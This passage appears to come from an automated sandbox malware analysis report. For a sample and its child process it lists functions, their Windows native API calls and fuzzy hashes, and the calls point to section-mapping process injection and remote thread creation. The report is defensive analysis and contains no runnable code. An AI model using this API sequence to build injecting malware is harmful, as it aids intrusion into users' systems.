Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

Function 004014AD Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

Function 004014D5 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

Function 00402F55 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403089
NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

Function 0089C380 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0089C3A8
Module32First.KERNEL32(00000000,00000224), ref: 0089C3C8

Memory Dump Source

Source File: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0088A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88a000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9653f18e761d294f06cb07c2ce6707d23551a6c694394589c3116aa647c7518a
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D0F0CD32200710BFDB203AB9AC8CA6E72E8FF48324F184528E642D25C0DBB1E8055A61

Function 004030B2 Relevance: 1.6, APIs: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL ref: 004030A2

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

Function 0084003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0084024D

Strings

cess, xrefs: 0084018D
kernel32.dll, xrefs: 0084008F, 00840095

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 96a40388b9270507752d7a06013d02a314efefd408bd225691babbdb7a835a92
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 1F526874A01229DFDB64CF58C984BA9BBB1FF09304F1480E9E54DAB251DB30AE85DF15

Function 00840E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00840223,?,?), ref: 00840E19
SetErrorMode.KERNELBASE(00000000,?,?,00840223,?,?), ref: 00840E1E

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 2f2d246c11f8448de6aec2b2e019bb55cea588eb2b381de00cadfc34988edbde
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4FD0123114512C77D7002A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994046E5

Function 00401869 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

Function 00401874 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

Function 00401894 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B

Function 00401898 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B

Function 0089C03F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0089C090

Memory Dump Source

Source File: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0088A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88a000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8c5680c6e5ac00764003533bab93be67e95fad66fe9bc378287c05ea65dfa0b9
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 76113C79A40208EFDB01DF98C985E98BBF5EF08350F0980A4F9489B362D371EA50DF80

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B

Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004018B7

Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B

Non-executed Functions

Function 0084092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 008409DC, 008409DF, 008409E4
., xrefs: 0084095F
l, xrefs: 00840966

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a331c924a8266b12c4c818ed0aaa2426c481ba71ed02c3d6dcb2ed812f944728
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 2B3137B6910609DFDB10CF99C880AAEBBF5FF48328F24414AD541E7211D771AA45CFA4

Function 0084154D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction ID: b8800b36c7b853d1e55be053ba53ec9dfe7767840f70e0cc563241b4f35d08b0
Opcode Fuzzy Hash: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
Instruction Fuzzy Hash: 1E21F2728A42449EDF559FB4C9870C67F72BE237287B417A8C0618B272CAA69113CB52

Function 0089BC5D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712342116.000000000088A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0088A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88a000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 501358e5ab9655f63b6b73172668ad21de859ce5f13eb84f9e7de02f565faf2a
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: D61170723401009FDB54DE55EDC1EA673EAFB89324B298055E904CB315EB75EC01C760

Function 00841C71 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: 9e3cf8588fd55f9d01af8694bc5fb5caf99b4ff65db1198438c17fb48dbbba6c
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: 47117C2049D3C45BC3838B7CD699583BF64BE0B230B5A55EED8C18F913C341A955D3A3

Function 00401C0A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction ID: ac47c9089ab74bbd4744f5430c59f4e61b9adfdf7c8bba648fb7bf2dae8000a3
Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
Instruction Fuzzy Hash: 10115A2049D3C05BC3878B7CD595483BFA47D1B230B5A55EED8C24F963C394A925D3A3

Function 00841CC5 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 00401C5E Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711816975.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_h8jGj6Qe78.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763

Function 00840D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_h8jGj6Qe78.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: d056108fe337393ff861ab54fb4f6a27d31e02048e04b7f8a7846f92259bad79
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1201DF72A006088FDB21CF60C804BAB33B5FB86306F1545A4DA0AD7281E370A9458F80

Analysis Process: ewggbbhPID: 8020, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	120
Total number of Limit Nodes:	3

Executed Functions

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000003.00000002.1937639763.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ewggbbh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
